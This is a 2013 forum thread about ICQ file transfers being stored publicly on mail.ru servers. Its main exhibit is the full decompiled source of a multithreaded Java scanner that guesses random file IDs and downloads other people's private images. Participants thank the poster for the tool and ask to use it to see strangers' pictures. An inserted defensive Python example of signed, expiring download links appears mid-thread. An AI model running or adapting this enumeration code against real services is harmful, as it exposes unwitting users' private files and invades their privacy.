Old 01-12-2013, 03:36 AM   #1
just a punk
So fuckin' bored
Join Date: Jun 2003
Posts: 32,383
Sending files via ICQ? You're fucked!

Read this: http://translate.google.com/translat...s%2F6239 5%2F

This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385

You've been warned (many times already actually).
__________________
Obey the Cowgod

Last edited by just a punk; 01-12-2013 at 03:49 AM..
Old 01-12-2013, 07:54 AM   #2
facialfreak
Confirmed User
Join Date: Feb 2005
Location: Montreal
Posts: 3,018
Yep... People need to learn the basics in online security NOW!!

The days of 'bank robbers' and 'vinyl siding/home reno salesmen' are quickly disappearing!! It is much simpler to scam people online!

If you do not know how to protect yourself .... then NOW is the time to ask somebody who does!
Old 01-12-2013, 09:28 AM   #3
marlboroack
So Fucking Banned
Join Date: Jul 2010
Location: ☣
Posts: 9,327
So I guess you're double fucked if you have a Mac?
Old 01-12-2013, 10:09 AM   #4
just a punk
So fuckin' bored
Join Date: Jun 2003
Posts: 32,383
It does not matter what you have. Every file you send via ICQ is being uploaded to the mail.ru servers and becomes available to everyone.
__________________
Obey the Cowgod
Old 01-13-2013, 10:11 PM   #5
$5 submissions
I help you SUCCEED
Join Date: Nov 2003
Location: The Pearl of the Orient Seas
Posts: 32,195
Man, that's rough. Thanks for this: This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385
Old 01-13-2013, 10:18 PM   #6
rowan
Too lazy to set a custom title
Join Date: Mar 2002
Location: Australia
Posts: 17,393
Speaking of security, I thought we'd all disabled Java.
Old 01-13-2013, 10:27 PM   #7
Dirty F
Too lazy to set a custom title
Join Date: Jul 2001
Posts: 59,204
I have no clue what all of this means. I simply want to see all these private pictures. How do I do that?
Old 01-13-2013, 10:53 PM   #8
CYF
Coupon Guru
Join Date: Mar 2009
Location: Minneapolis
Posts: 10,973
Quote:
Originally Posted by Dirty F View Post
I have no clue what all of this means. I simply want to see all these private pictures. How do I do that?
I wrote a bash script to download everything.... but I'm getting a 404. Even for files they posted in the example image which should work.

Maybe the java has something that I'm missing, but I'm not about to run a .jar from an unknown Russian source
Last edited by CYF; 01-13-2013 at 10:56 PM..
Old 01-13-2013, 11:07 PM   #9
Dirty F
Too lazy to set a custom title
Join Date: Jul 2001
Posts: 59,204
Once it works may I use it?
Old 01-13-2013, 11:07 PM   #10
Dirty F
Too lazy to set a custom title
Join Date: Jul 2001
Posts: 59,204
Or simply share the download with me
Old 01-14-2013, 04:13 AM   #11
just a punk
So fuckin' bored
Join Date: Jun 2003
Posts: 32,383
Quote:
Originally Posted by rowan View Post
Speaking of security, I thought we'd all disabled Java.
This has nothing to do with Java.
__________________
Obey the Cowgod
Old 01-14-2013, 04:19 AM   #12
just a punk
So fuckin' bored
Join Date: Jun 2003
Posts: 32,383
Quote:
Originally Posted by CYF View Post
I wrote a bash script to download everything.... but I'm getting a 404. Even for files they posted in the example image which should work.

Maybe the java has something that I'm missing, but I'm not about to run a .jar from an unknown Russian source
If you'd spent a bit more time reading, you would have found the source of that Java app "from an unknown Russian source", which is located here: http://pastebin.com/n1qpNM4y. There are no backdoors in it, so you can compile and run it yourself.

However AFAIK it doesn't work anymore because mail.ru has moved all files to another location and they are 404 now... after they already leaked into the public. "Good job".
__________________
Obey the Cowgod
Old 01-14-2013, 04:30 AM   #13
just a punk
So fuckin' bored
Join Date: Jun 2003
Posts: 32,383

Quote:
Originally Posted by $5 submissions View Post
Man, that's rough. Thanks for this: This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385
I didn't get it. What exactly is "rough" there? Java is not an .exe and it's easy to reverse (de-compile). If you think there is a virus in some Java app, why don't you just check it here: http://www.showmycode.com/? That's so fuckin' simple and can be done even by a kid.

Here are the REVERSED contents of that jar:

IFS.class
Code:
import java.io.PrintStream;
import java.util.Random;

public class IFS
{
    /* member class not found */
    class MyRunnable {}


    public IFS()
    {
    }

    public static void main(String args[])
    {
        System.out.println("ICQ Files Scanner 0.3");
        for(int i = 0; i < 50; i++)
            (new Thread(new MyRunnable(i))).start();

    }

    public static String generateString(Random random, String s, int i)
    {
        char ac[] = new char[i];
        for(int j = 0; j < i; j++)
            ac[j] = s.charAt(random.nextInt(s.length()));

        return new String(ac);
    }

    private static final int THREADS = 50;
}
IFS$MyRunnable.class
Code:
import java.io.*;
import java.net.*;
import java.util.Random;

private static class mThreadId
    implements Runnable
{

    public void run()
    {
        File file = new File("out");
        file.mkdirs();
        String s = String.format("ifs%d.txt", new Object[] {
            Integer.valueOf(mThreadId)
        });
        do
        {
            mTotal++;
            String s1 = IFS.generateString(random, "1234567890QWERTYUIOPASDFGHJKLZXCVBNM", 6);
            String s2 = String.format("http://files.mail.ru/%s", new Object[] {
                s1
            });
            try
            {
                URL url = new URL(s2);
                URLConnection urlconnection = url.openConnection();
                urlconnection.connect();
                urlconnection.getContent();
                String s3 = urlconnection.getContentType();
                int i = urlconnection.getContentLength();
                String s4 = "done    ";
                if(i != 4189)
                {
                    if("image/jpeg".equals(s3))
                    {
                        File file1 = new File("out", (new StringBuilder()).append(s1).append(".jpg").toString());
                        saveBinaryFile(urlconnection, i, url, file1);
                    } else
                    if("image/tiff".equals(s3))
                    {
                        File file2 = new File("out", (new StringBuilder()).append(s1).append(".tiff").toString());
                        saveBinaryFile(urlconnection, i, url, file2);
                    } else
                    if("image/x-ms-bmp".equals(s3))
                    {
                        File file3 = new File("out", (new StringBuilder()).append(s1).append(".bmp").toString());
                        saveBinaryFile(urlconnection, i, url, file3);
                    } else
                    if("image/png".equals(s3))
                    {
                        File file4 = new File("out", (new StringBuilder()).append(s1).append(".png").toString());
                        saveBinaryFile(urlconnection, i, url, file4);
                    } else
                    if("image/gif".equals(s3))
                    {
                        File file5 = new File("out", (new StringBuilder()).append(s1).append(".gif").toString());
                        saveBinaryFile(urlconnection, i, url, file5);
                    } else
                    {
                        File file6 = new File("out", (new StringBuilder()).append(s1).append(".mpg").toString());
                        saveBinaryFile(urlconnection, i, url, file6);
                    }
                } else
                {
                    s4 = "not found";
                }
                mSuccess++;
                double d = mSuccess / mTotal;
                String s5 = String.format("(%d) %s %d/%d=%f %s %d %s", new Object[] {
                    Integer.valueOf(mThreadId), s4, Integer.valueOf(mSuccess), Integer.valueOf(mTotal), Double.valueOf(d), s3, Integer.valueOf(i), s2
                });
                System.out.println(s5);
                writeToFile(s, s5);
            }
            catch(MalformedURLException malformedurlexception)
            {
                System.out.println(String.format("(%d) %s", new Object[] {
                    Integer.valueOf(mThreadId), malformedurlexception.getMessage()
                }));
            }
            catch(FileNotFoundException filenotfoundexception) { }
            catch(IOException ioexception)
            {
                System.out.println(String.format("(%d) %s", new Object[] {
                    Integer.valueOf(mThreadId), ioexception.getMessage()
                }));
            }
        } while(true);
    }

    private void saveBinaryFile(URLConnection urlconnection, int i, URL url, File file)
        throws IOException
    {
        InputStream inputstream = urlconnection.getInputStream();
        BufferedInputStream bufferedinputstream = new BufferedInputStream(inputstream);
        byte abyte0[] = new byte[i];
        boolean flag = false;
        int k = 0;
        do
        {
            if(k >= i)
                break;
            int j = bufferedinputstream.read(abyte0, k, abyte0.length - k);
            if(j == -1)
                break;
            k += j;
        } while(true);
        bufferedinputstream.close();
        if(k != i)
        {
            throw new IOException((new StringBuilder()).append("Only read ").append(k).append(" bytes; Expected ").append(i).append(" bytes").toString());
        } else
        {
            FileOutputStream fileoutputstream = new FileOutputStream(file);
            fileoutputstream.write(abyte0);
            fileoutputstream.flush();
            fileoutputstream.close();
            return;
        }
    }

    private void writeToFile(String s, String s1)
    {
        BufferedWriter bufferedwriter;
        Object obj = null;
        bufferedwriter = null;
        FileWriter filewriter = new FileWriter(s, true);
        bufferedwriter = new BufferedWriter(filewriter);
        bufferedwriter.append(s1);
        bufferedwriter.newLine();
        try
        {
            if(bufferedwriter != null)
                bufferedwriter.close();
        }
        catch(IOException ioexception) { }
        break MISSING_BLOCK_LABEL_128;
        IOException ioexception1;
        ioexception1;
        System.out.println(String.format("(%d) %s", new Object[] {
            Integer.valueOf(mThreadId), ioexception1.getMessage()
        }));
        try
        {
            if(bufferedwriter != null)
                bufferedwriter.close();
        }
        catch(IOException ioexception2) { }
        break MISSING_BLOCK_LABEL_128;
        Exception exception;
        exception;
        try
        {
            if(bufferedwriter != null)
                bufferedwriter.close();
        }
        catch(IOException ioexception3) { }
        throw exception;
    }

    private static final String CHARS = "1234567890QWERTYUIOPASDFGHJKLZXCVBNM";
    private static final int ID_LENGTH = 6;
    private static final String STR_MESSAGE = "(%d) %s";
    private static final String STR_SUCCESS = "(%d) %s %d/%d=%f %s %d %s";
    private static final String FILE_NAME = "ifs%d.txt";
    private static final String URL = "http://files.mail.ru/%s";
    private static final int MAX_SIZE = 0x6400000;
    private final Random random = new Random();
    private final int mThreadId;
    private int mSuccess;
    private int mTotal;

    public tion(int i)
    {
        mSuccess = 0;
        mTotal = 0;
        mThreadId = i;
    }
}
Some people are afraid of even their own shadow

P.S. You are too late because it doesn't work anymore
__________________
Obey the Cowgod

Last edited by just a punk; 01-14-2013 at 04:44 AM..
Old 01-14-2013, 06:34 AM   #14
ZeroHero
So Fucking Banned
Join Date: Nov 2007
Location: Westbahnhof
Posts: 15,336
many thanks for this
Old 01-14-2013, 06:39 AM   #15
BIGTYMER
Junior Achiever
Join Date: Nov 2004
Location: Walled Garden
Posts: 17,066
What is the mail.ru connection? Do ICQ and mail.ru have the same owner?
Old 01-14-2013, 07:58 AM   #16
just a punk
So fuckin' bored
Join Date: Jun 2003
Posts: 32,383

ICQ is an instant messaging computer program that was first developed and popularized by the Israeli company Mirabilis, then bought by America Online, and since April 2010 owned by Mail.ru Group.

And yes, mail.ru and icq.com have the same owner and they share the same servers.

Once again, the problem is the following. Before 2010 ICQ was using a P2P protocol to transfer a file between two clients. Now ALL files you send to someone over ICQ go to the mail.ru servers where they get stored permanently and are openly available to any 3rd person.

For example: http://files.icq.net/files/get?fileId=E132656500FC40E99DC98575E53616D5 (mail.ru alias: http://files.mail.ru/files/get?fileId=E132656500FC40E99DC98575E53616D5) is a file which was sent from one ICQ client to another one.

They just replaced 6-byte file IDs with 16-byte hashes (this is why that Java scanner doesn't work anymore) but the security problem was not fixed. The files you send via ICQ aren't safe. Everything you sent is now stored on mail.ru servers without any protection.

1) They are collecting your data.
2) They do not protect it from others.

Do you see what I mean now?
__________________
Obey the Cowgod

Last edited by just a punk; 01-14-2013 at 08:04 AM..
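An added example, not part of the thread and not ICQ's or mail.ru's code: post #16 says that lengthening the file ID left stored files readable by anyone holding a link. The Python below shows a server-side control that closes that gap, a random 128-bit ID combined with an HMAC-signed, expiring link that is honoured only for the logged-in recipient; the key, the parameter names `to`/`exp`/`sig` and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import json
import math
import secrets
import time

# Hypothetical server-side secret; a real service keeps it in a KMS/HSM.
SERVER_KEY = secrets.token_bytes(32)

# ID scheme the decompiled scanner guessed against: 6 chars from 36 symbols.
OLD_ALPHABET_SIZE = 36
OLD_ID_LENGTH = 6


def id_space_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of an ID drawn uniformly from alphabet_size**length."""
    return length * math.log2(alphabet_size)


def new_file_id() -> str:
    """128-bit identifier from the OS CSPRNG, hex encoded (32 characters)."""
    return secrets.token_hex(16)


def _mac(file_id: str, recipient: str, expires: int) -> bytes:
    # JSON list encoding keeps the three fields unambiguous inside the MAC input.
    msg = json.dumps([file_id, recipient, expires]).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest().encode()


def issue_link(file_id: str, recipient: str, ttl: int = 3600, now=None) -> dict:
    """Query parameters for a download link valid for one recipient until exp."""
    now = int(time.time()) if now is None else now
    expires = now + ttl
    sig = _mac(file_id, recipient, expires).decode()
    return {"fileId": file_id, "to": recipient, "exp": expires, "sig": sig}


def authorize(params: dict, session_user, now=None) -> bool:
    """Serve the file only for an untampered, unexpired link opened by its recipient."""
    now = int(time.time()) if now is None else now
    try:
        file_id = str(params["fileId"])
        recipient = str(params["to"])
        expires = int(params["exp"])
        sig = str(params["sig"]).encode()
    except (KeyError, TypeError, ValueError):
        return False
    # Constant-time comparison: knowing or guessing the ID alone is not enough.
    if not hmac.compare_digest(_mac(file_id, recipient, expires), sig):
        return False
    if now >= expires:
        return False
    # The authenticated session must belong to the intended recipient.
    return session_user is not None and session_user == recipient


if __name__ == "__main__":
    print("old ID space: %.1f bits" % id_space_bits(OLD_ALPHABET_SIZE, OLD_ID_LENGTH))
    link = issue_link(new_file_id(), "constructed-recipient-1")
    print(authorize(link, "constructed-recipient-1"), authorize(link, None))
```

With this check in place the ID only names the object; access depends on the signature, the expiry and the session, so a leaked or guessed ID returns nothing.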
Old 01-14-2013, 09:11 AM   #17
Tom_PM
Porn Meister
Join Date: Feb 2005
Posts: 16,443
So that picture someone sent me of a cat who fell asleep in its bowl of food is being seen by everyone? Ohmygod
__________________
43-922-863 Shut up and play your guitar.
Old 01-14-2013, 10:04 AM   #18
JamesM
Confirmed User
Join Date: Nov 2012
Posts: 732
Pretty bad move, storing public data on servers where it can be easily accessed by anyone with internet.
Old 01-14-2013, 11:34 AM   #19
just a punk
So fuckin' bored
Join Date: Jun 2003
Posts: 32,383
Quote:
Originally Posted by PR_Tom View Post
So that picture someone sent me of a cat who fell asleep in its bowl of food is being seen by everyone? Ohmygod
So you don't use ICQ for work purposes? Good for you.
__________________
Obey the Cowgod
Old 01-14-2013, 11:38 AM   #20
Supz
Arthur Flegenheimer
Join Date: Jul 2006
Location: New York City
Posts: 11,056
I am not sure why adult webmasters and Russian spammers are still the only people using ICQ. I deleted my ICQ at least a year ago. There are much better, secure ways of chatting online.
Old 01-14-2013, 11:40 AM   #21
just a punk
So fuckin' bored
Join Date: Jun 2003
Posts: 32,383
Quote:
Originally Posted by Supz View Post
There are much better, secure ways of chatting online.
Jabber
__________________
Obey the Cowgod
Old 01-14-2013, 12:22 PM   #22
Tom_PM
Porn Meister
Join Date: Feb 2005
Posts: 16,443
Quote:
Originally Posted by CyberSEO View Post
So you don't use ICQ for work purposes? Good for you.
With file sending? Nope. I can't recall a single important work item I've ever sent as a file through ICQ ever. Usually just a funny picture now and then.
__________________
43-922-863 Shut up and play your guitar.
Old 01-14-2013, 03:11 PM   #23
just a punk
So fuckin' bored
Join Date: Jun 2003
Posts: 32,383
FYI: all your ICQ chat logs are also stored on their servers.
__________________
Obey the Cowgod
Old 01-14-2013, 04:02 PM   #24
PornDiscounts-V
Confirmed User
Join Date: Oct 2003
Location: L.A.
Posts: 5,744
Looks like 35PPS program just got some more verified twitter account images. ;)
Old 01-14-2013, 04:40 PM   #25
rowan
Too lazy to set a custom title
Join Date: Mar 2002
Location: Australia
Posts: 17,393
Quote:
Originally Posted by CyberSEO View Post
This has nothing to do with Java.
I know the issue is not directly related to Java, but I thought it was a little ironic that you pointed towards a Java file on a Russian server only a few days after the hysteria over Java's security started.